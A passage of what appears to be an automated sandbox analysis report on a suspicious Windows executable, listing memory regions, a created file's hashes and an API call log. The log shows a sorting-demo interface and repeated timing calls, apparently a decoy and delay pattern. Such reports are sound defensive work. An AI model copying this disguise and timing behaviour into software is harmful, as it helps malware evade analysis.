pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Created Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\kft6utqw\appdata\local\temp\~df0894a2d8a2a8bfc2.tmp 16.00 KB MD5: ce338fe6899778aacfc28414f2d9498b
SHA1: 897256b6709e1a4da9daba92b6bde39ccfccd8c1
SHA256: 4fe7b59af6de3b665b67788cc2f99892ab827efae3a467342b3bb4e3bc8e5bfe
False
Threads
Thread 0x6a0
845 0
»
Category Operation Information Success Count Logfile
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 False 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_INPUT_HANDLE True 1
Fn
File Get Info filename = STD_INPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 1
Fn
File Get Info filename = STD_OUTPUT_HANDLE, type = file_type False 1
Fn
File Open filename = STD_ERROR_HANDLE True 1
Fn
File Get Info filename = STD_ERROR_HANDLE, type = file_type False 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, size = 260 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x75fb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1
Fn
Mutex Create - True 1
Fn
Module Get Handle module_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, base_address = 0x400000 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
Module Get Filename module_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, size = 260 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Load module_name = OLEAUT32.DLL, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Operating System True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x75a00000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x75a52055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x75a25934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x75a259b4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x75a7f15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x75a7d332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x75a7d155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75be0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Module Get Filename process_name = c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe, file_name_orig = C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x752d0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x771c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 246096028 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Sorting Algorithm Comparison, wndproc_parameter = 0 True 1
Fn
Window Create window_name = RadixSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = MergeSort, wndproc_parameter = 0 True 1
Fn
Window Create window_name = QuickSort, wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
Window Create wndproc_parameter = 0 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 273922 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 273937 True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 273968 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 273984 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274000 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274031 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274031 True 1
Fn
System Get Time type = Ticks, time = 274046 True 4
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274046 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274062 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274078 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274093 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274109 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274109 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274124 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274140 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274156 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:45 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274171 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274187 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274202 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274202 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274218 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274234 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274249 True 5
Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1
Fn
System Get Time type = Local Time, time = 2018-06-26 00:54:46 (Local Time) True 1
Fn
System Get Time type = Ticks, time = 274265 True 25
Fn
System Get Time type = Ticks, time = 274280 True 35
Fn
System Get Time type = Ticks, time = 274296 True 40
Fn
System Get Time type = Ticks, time = 274312 True 40
Fn
System Get Time type = Ticks, time = 274327 True 35
Fn
System Get Time type = Ticks, time = 274343 True 35
Fn
System Get Time type = Ticks, time = 274358 True 40
Fn
System Get Time type = Ticks, time = 274374 True 40
Fn
System Get Time type = Ticks, time = 274390 True 40
Fn
System Get Time type = Ticks, time = 274405 True 26
Fn
System Get Time type = Ticks, time = 274421 True 19
Fn
System Get Time type = Ticks, time = 274436 True 40
Fn
System Get Time type = Ticks, time = 274452 True 40
Fn
System Get Time type = Ticks, time = 274468 True 39
Fn
System Get Time type = Ticks, time = 274483 True 37
Fn
System Get Time type = Ticks, time = 274499 True 39
Fn
System Get Time type = Ticks, time = 274514 True 40
Fn
System Get Time type = Ticks, time = 274530 True 25
Fn
System Get Time type = Ticks, time = 274546 True 16
Fn
System Get Time type = Ticks, time = 274561 True 16
Fn
System Get Time type = Ticks, time = 274577 True 16
Fn
System Get Time type = Ticks, time = 274592 True 10
Fn
Function Logfile
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Before

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
After

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".


    
Screenshot
Expand-Icon
Exit-Icon
icon_left
icon_left
image